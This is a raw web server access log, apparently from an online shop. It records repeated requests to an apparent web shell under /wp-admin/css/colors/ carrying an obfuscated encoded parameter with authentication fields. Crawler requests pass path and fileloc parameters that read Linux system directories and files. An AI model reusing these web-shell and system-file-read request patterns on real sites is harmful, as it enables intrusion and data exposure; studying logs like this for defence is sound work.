103.7.226.137 - - [05/Nov/2025:21:07:47 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353236372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313636372q6365636631383735633465616335393732613962343539633534313639326439222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:09:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_timestamp&path=//proc/sys/net/netfilter HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:56 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_icmp_timeout&path=//proc/sys/net/netfilter HTTP/2" 200 2521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:09:59 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_log_invalid&path=//proc/sys/net/netfilter HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_generic_timeout&path=//proc/sys/net/netfilter HTTP/2" 200 2525 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:10 +0700] "GET /shopbrand557852348?path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 3001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:08:09 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353238392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313638392q3639333762346334623034313238336432626238343565353431356134323837222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:10:13 +0700] "GET /shopbrand557777056?path=//lib/gcc/x86_64-redhat-linux/4.8.5/32 HTTP/2" 200 3514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:21 +0700] "GET /shopbrand557852348?path=//proc/sys/net/ipv4/conf HTTP/2" 200 2951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:28 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_conntrack_udp_timeout&path=//proc/sys/net/netfilter HTTP/2" 200 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:08:31 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353331312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313731312q6461363934393230323763326466383330366330396436383735653037393938222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:10:32 +0700] "GET /shopbrand557860470?path=//proc/sys/net/ipv4/conf HTTP/2" 200 2951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:35 +0700] "GET /shopbrand557860470?path=//proc/sys/net/ipv6/icmp HTTP/2" 200 2834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:42 +0700] "GET /shopbrand557777056?fileloc=//lib/gcc/x86_64-redhat-linux/4.8.5/32/libgcc_eh.a&path=//lib/gcc/x86_64-redhat-linux/4.8.5/32 HTTP/2" 200 19211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:46 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/12&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:49 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/11&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:08:53 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353333332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313733332q3565343134363365643035336138353330373134633664316363653663616561222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:10:55 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/5&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:10:59 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv6/icmp/ratelimit&path=//proc/sys/net/ipv6/icmp HTTP/2" 200 2521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/10&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:09 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/8&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:12 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/9&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:09:16 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353335362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313735362q3363313436656665323435323033636633303466643337373431633633313238222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:11:19 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/3&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:22 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/4&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:29 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/2&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:32 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/6&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:35 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/1&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:09:38 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353337382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313737382q6130373864643836383331626235333136633338643833633065373737363461222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:11:41 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/7&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:44 +0700] "GET /shopbrand557860470?path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 3698 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:11:51 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/netfilter/nf_log/0&path=//proc/sys/net/netfilter/nf_log HTTP/2" 200 2510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.15 - - [05/Nov/2025:21:11:54 +0700] "GET /shopbrand446142935?kg=0445171406 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:11:54 +0700] "GET /shopbrand557852348?path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 3647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:00 +0700] "GET /shopbrand557860470?path=//proc/sys/net/ipv6/conf HTTP/2" 200 2951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:10:00 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353430302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313830302q3936663831306562356438393363303139303831326333303462626138393838222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:12:04 +0700] "GET /shopbrand557777056?path=//lib/gcc/x86_64-redhat-linux/4.8.5/include HTTP/2" 200 4493 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:07 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/src_valid_mark&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:10 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/default/mc_forwarding&path=//proc/sys/net/ipv4/conf/default HTTP/2" 200 2530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:17 +0700] "GET /shopbrand557860470?path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 3599 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:21 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/route_localnet&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2519 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:10:22 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353432322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313832322q3762383438656430666264326262653563303633393636383539376130383236222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:12:24 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/send_redirects&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.58 - - [05/Nov/2025:21:12:25 +0700] "GET /shopbrand446205505?kg=0445233838 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
74.7.227.128 - - [05/Nov/2025:21:12:27 +0700] "GET /shopbrand557777056?fileloc=//lib/gcc/x86_64-redhat-linux/4.8.5/include/rdseedintrin.h&path=//lib/gcc/x86_64-redhat-linux/4.8.5/include HTTP/2" 200 3324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:33 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/arp_announce&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:36 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/arp_notify&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:39 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/accept_redirects&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:43 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/arp_filter&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:10:44 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353434342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313834342q3161663161626332353864313334653566333531646634396535303366353663222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:12:46 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/accept_local&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:53 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/accept_redirects&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:12:57 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/promote_secondaries&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:00 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/arp_filter&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/bootp_relay&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:11:06 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353436362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313836362q3337326562333038303232376332356333626534343366383832393366343037222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:13:10 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/arp_accept&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:16 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/arp_announce&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:20 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/accept_local&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:27 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/rp_filter&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:11:28 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353438382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313838382q3934303263353837653639623333663138353162623465396266616166643130222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:13:33 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/arp_accept&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2515 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:37 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/rp_filter&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:43 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/send_redirects&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:46 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/proxy_arp&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:13:50 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/arp_notify&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [05/Nov/2025:21:11:50 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323335353531302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323335313931302q6533623337343164306231383732613439343765353737336430656131653939222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [05/Nov/2025:21:13:53 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/bootp_relay&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2516 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:00 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/secure_redirects&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:03 +0700] "GET /shopbrand557860470?fileloc=//proc/sys/net/ipv4/conf/lo/promote_secondaries&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2517 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [05/Nov/2025:21:14:06 +0700] "GET /shopbrand557852348?fileloc=//proc/sys/net/ipv4/conf/lo/accept_source_route&path=//proc/sys/net/ipv4/conf/lo HTTP/2" 200 2523 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
